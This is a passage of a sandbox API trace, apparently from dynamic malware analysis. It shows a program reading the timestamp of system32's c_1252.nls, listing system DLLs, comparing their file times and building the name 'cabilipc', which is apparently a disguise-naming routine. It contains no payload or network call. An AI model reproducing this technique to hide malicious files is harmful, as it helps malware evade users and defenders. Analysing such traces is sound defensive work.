-1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.348] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.348] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.349] StrChrA (lpStart="Clipc.dll", wMatch=0x2e) returned=".dll" [0055.349] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.349] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.349] FindClose (in: hFindFile=0x63e308 | out: hFindFile=0x63e308) returned 1 [0055.349] lstrlenA (lpString="cabilipc") returned 8 [0055.349] mbstowcs (in: _Dest=0x23586d0, _Source="cabilipc", _MaxCount=0xe | out: _Dest="cabilipc") returned 0x8 [0055.349] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x20 [0055.349] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x2358710, nSize=0x20 | out: lpDst="C:\\Windows\\system32\\c_1252.nls") returned 0x1f [0055.349] CreateFileA (lpFileName="C:\\Windows\\system32\\c_1252.nls" (normalized: "c:\\windows\\system32\\c_1252.nls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0055.349] GetFileTime (in: hFile=0x178, lpCreationTime=0x1f4feac, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x1f4feac*(dwLowDateTime=0x9656d311, dwHighDateTime=0x1d0baff), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0055.349] CloseHandle (hObject=0x178) returned 1 [0055.349] StrRChrA (lpStart="C:\\Windows\\system32\\c_1252.nls", lpEnd=0x0, wMatch=0x5c) returned="\\c_1252.nls" [0055.349] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\*.dll" | out: lpString1="C:\\Windows\\system32\\*.dll") returned="C:\\Windows\\system32\\*.dll" [0055.349] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\*.dll", lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 0x63e6c8 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.350] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.350] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.351] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.351] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.352] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.352] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.353] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.354] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.354] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] StrChrA (lpStart="autoplay.dll", wMatch=0x2e) returned=".dll" [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.355] FindNextFileA (in: hFindFile=0x63e6c8, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.355] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 